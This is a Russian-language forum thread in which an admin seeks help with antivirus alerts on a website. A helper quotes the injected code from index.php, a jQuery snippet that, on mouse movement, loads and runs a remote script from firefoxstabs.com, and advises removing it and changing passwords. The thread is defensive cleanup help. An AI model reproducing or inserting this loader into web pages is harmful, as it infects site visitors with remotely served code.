Вирус на сайте

[Mr.kvn]

Доброго времени суток!

У меня следующая проблема: я помогаю в администрировании сайта mtt.com.ua. Все было хорошо и вот месяц назад начались проблемы - на многих страницах сайта разные антивирусные системы (в т.ч. и касперский) начали ругаться. Сам сайт я не создавал (там самописная админка и изобретателя найти не представляется возможным). До поры, до времени я не особо нервничал т.к. все вирусы были в java-скриптах, которые я аккуратненько удалял (сделав бэкап) и при этом функционал не менялся (по крайней мере я не видел и жалоб до сих пор не поступало). Но сейчас беда оказалась в index-ном файле категории... Тут уже мириться не представляется возможным.

 

Ссылка проверки на вирусы: virustotal

 

Заранее благодарю за помощь в решении проблеммы.

Сообщение от модератора Mark D. Pearlstone

Файл и потенциально вредоносная ссылка удалены. Если потребуется, хелперы запросят у вас ссылку, которую вы можете им передать через личные сообщения.

[SLASH_id]

Отредактируйте index.php

Удалите оттуда скрипт в самом конце:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});

 

Смените пароли на админку, хостинг и прочие.

[Mr.kvn]

Адрес https://ajax.googleapis.com/ajax/libs/jquer...1/jquery.min.js вроде как безобидный...

 

Дело в том, что этот скрипт предназначается для вставки Google Analytics из админки. Другой вопрос, что на других старницах все норм, а тут... Я абсолютный дуб в java, поэтому не знаю какой фрагмент отсюда вырезать, чтобы функционал остался на месте, а вируса не было...

 

P.s. собственно, где тут вирус? Поясните пожалуйста... просто чтобы на будущее знать.

[SLASH_id]

Отрежьте все после

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>

А лучше вырежьте все. А после - вставьте код от Google Analytics

Изменено 30 июля, 2011 пользователем SLASH_id

[Mr.kvn]

Отрезал поле - все равно ругается

[SLASH_id]

У меня в данный момент не ругается на http://mtt.com.ua/

[_Strannik_]

У меня в данный момент не ругается на http://mtt.com.ua/

Аналогично.. все нормально.

[Mark D. Pearlstone]

У меня в данный момент не ругается на http://mtt.com.ua/

Аналогично.. все нормально.

На данную ссылку и утром антивирус не ругался, поэтому она была не удалена. Ссылка же с детектом была убрана из первого сообщения.

[SLASH_id]

На ту ссылку тоже ругаться перестал.